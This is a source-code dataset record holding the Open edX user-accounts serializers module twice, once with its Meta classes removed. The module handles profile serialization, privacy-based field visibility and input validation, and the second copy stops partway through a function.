Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
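Illustrative only, not part of the serializer module above: the digit-stripping rule used by PhoneNumberSerializer.to_internal_value, applied to two sample inputs.

import re

# Same regular expression as in PhoneNumberSerializer.to_internal_value.
assert (re.sub("[^0-9]", "", "+1 (555) 010-1234") or None) == "15550101234"
assert (re.sub("[^0-9]", "", "no digits at all") or None) is None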
| 39.64297
| 124
| 0.676895
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
class Meta:
model = LanguageProficiency
fields = ("code",)
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
class Meta:
model = SocialLink
fields = ("platform", "social_link")
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def __init__(self, *args, **kwargs):
# Don't pass the 'configuration' arg up to the superclass
self.configuration = kwargs.pop('configuration', None)
if not self.configuration:
self.configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
# Don't pass the 'custom_fields' arg up to the superclass
self.custom_fields = kwargs.pop('custom_fields', [])
super().__init__(*args, **kwargs)
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class Meta:
model = UserPasswordToggleHistory
fields = ("created", "comment", "disabled", "created_by")
def get_created_by(self, user_password_toggle_history):
return user_password_toggle_history.created_by.username
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class Meta:
model = User
fields = ("username", "email", "date_joined", "is_active", "password_toggle_history")
read_only_fields = fields
explicit_read_only_fields = ()
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
class Meta:
model = UserProfile
fields = (
"name", "gender", "goals", "year_of_birth", "level_of_education", "country", "state", "social_links",
"mailing_address", "bio", "profile_image", "requires_parental_consent", "language_proficiencies",
"phone_number"
)
# Currently no read-only field, but keep this so view code doesn't need to know.
read_only_fields = ()
explicit_read_only_fields = ("profile_image", "requires_parental_consent")
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class Meta:
model = UserProfile
fields = ('id', 'name')
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile')
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class Meta:
model = RetirementState
fields = ('id', 'state_name', 'state_execution_order')
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class Meta:
model = UserRetirementStatus
exclude = ['responses', ]
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class Meta:
model = User
fields = ('email', 'id', 'username')
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
class Meta:
model = PendingNameChange
fields = ('new_name',)
    def validate_new_name(self, new_name):
        if contains_html(new_name):
            raise serializers.ValidationError('Name cannot contain the following characters: < >')
        if contains_url(new_name):
            raise serializers.ValidationError('Name cannot contain a URL')
        # DRF field-level validators should return the validated value; without this,
        # validated_data['new_name'] would silently become None.
        return new_name
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
